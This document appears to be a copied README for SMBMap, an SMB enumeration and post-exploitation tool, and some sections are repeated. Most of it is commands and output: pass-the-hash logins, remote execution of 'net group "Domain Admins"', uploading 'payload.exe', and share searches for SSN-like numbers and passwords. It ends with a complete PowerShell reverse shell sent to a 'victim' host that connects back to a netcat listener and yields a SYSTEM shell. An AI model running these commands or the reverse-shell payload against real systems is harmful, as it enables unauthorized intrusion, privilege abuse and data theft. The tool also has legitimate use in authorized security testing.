Smbmap
Installation
$ sudo pip3 install smbmap
$ smbmap
smbmap
usage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN]
[-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode CMDMODE]
[-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]
[-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]
[--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
Features:
- Pass-the-Hash Support
- File upload/download/delete
- Permission enumeration (writable share, meet Metasploit)
- Remote Command Execution
- Distrubted file content searching (beta!)
- File name matching (with an auto downoad capability)
- Host file parser supports IPs, host names, and CIDR
Help
usage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE]
[-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH]
[--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
Command Execution:
$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'net group "Domain Admins" /domain'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445 Name: unkown
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
abcadmin
The command completed successfully.
Non recursive path listing (ls):
$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$/Users'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 172.16.0.24:445 Name: 172.16.0.24
Disk Permissions
---- -----------
C$ READ, WRITE
.Users
dw--w--w-- 0 Wed Apr 29 13:15:25 2015 .
dw--w--w-- 0 Wed Apr 29 13:15:25 2015 ..
dr--r--r-- 0 Wed Apr 22 14:50:36 2015 Administrator
dr--r--r-- 0 Thu Apr 9 14:46:57 2015 All Users
dw--w--w-- 0 Thu Apr 9 14:46:49 2015 Default
dr--r--r-- 0 Thu Apr 9 14:46:57 2015 Default User
fr--r--r-- 174 Thu Apr 9 14:44:01 2015 desktop.ini
dw--w--w-- 0 Thu Apr 9 14:46:49 2015 Public
dr--r--r-- 0 Wed Apr 22 13:33:01 2015 wingus
File Content Searching:
$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found
Host: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
Host: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found
Filesystem Interaction:
$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --download 'C$/Temp/secret.txt'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445 Name: 192.168.1.100
[+] Downloading file C$/Temp/secret.txt to secret.txt... (101 bytes)
[+] File download successful!
$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --upload 'payload.exe' 'C$/Temp/payload.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445 Name: 192.168.1.100
[+] Uploading file payload.exe to C$/Temp/payload.exe... (10024 bytes)
[+] File upload successful!
$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --delete 'C$/Temp/malicious.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445 Name: 192.168.1.100
[+] Are you sure you want to delete the file C$/Temp/malicious.exe? (y/n): y
[+] Deleting remote file C$/Temp/malicious.exe... (Success)
Examples:
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10
$ python smbmap.py -u user1,user2,user3 -p 'P@ssw0rd!' -d domain -H 192.168.1.10
$ python smbmap.py --host-file hosts.txt -u username -p 'password' -d domain
$ python smbmap.py --host-file hosts.txt --user-file users.txt --pass-file pass.txt -d domain
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -L
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$/Program Files'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -A 'web.config'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -g grep_out.txt
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --download 'C$/Temp/important.txt'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --upload 'payload.exe' 'C$/Temp/payload.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --delete 'C$/Temp/malicious.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -F '[Pp]assword'
Additional Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'
Default Output:
$ ./smbmap.py -H 192.168.12.123 -u administrator -p asdf1234
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.86.39...
[+] IP: 192.168.86.39:445 Name: biffhenderson-pc.lan
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
Users READ, WRITE
Command Execution:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445 Name: unknown
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
abcadmin
The command completed successfully.
Non-Recursive Path Listing (ls):
$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$/Users'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 172.16.0.24:445 Name: 172.16.0.24
Disk Permissions
---- -----------
C$ READ, WRITE
.Users
dw--w--w-- 0 Wed Apr 29 13:15:25 2015 .
dw--w--w-- 0 Wed Apr 29 13:15:25 2015 ..
dr--r--r-- 0 Wed Apr 22 14:50:36 2015 Administrator
dr--r--r-- 0 Thu Apr 9 14:46:57 2015 All Users
dw--w--w-- 0 Thu Apr 9 14:46:49 2015 Default
dr--r--r-- 0 Thu Apr 9 14:46:57 2015 Default User
fr--r--r-- 174 Thu Apr 9 14:44:01 2015 desktop.ini
dw--w--w-- 0 Thu Apr 9 14:46:49 2015 Public
dr--r--r-- 0 Wed Apr 22 13:33:01 2015 wingus
File Content Searching:
$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found
Host: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm
Host: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\biffh\AppData\Local\Microsoft\Internet Explorer\DOMStore\L7W17OPZ\static.olark[1].xml
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MIY2POGJ\validation[2].js
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Docs[1].htm
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Salesmaps[1].htm
Drive Listing:
This feature was added to complement the file content searching feature
$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.24:445 Name: unknown
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
E: \\vboxsrv\Public VirtualBox Shared Folders
Nifty Shell:
Run Powershell Script on Victim SMB host (change the IP in the code to your IP address, i.e., where the shell connects back to)
$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445 Name: unkown
[!] Error encountered, sharing violation, unable to retrieve output
Attackers Netcat Listener:
$ nc -l 4445
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
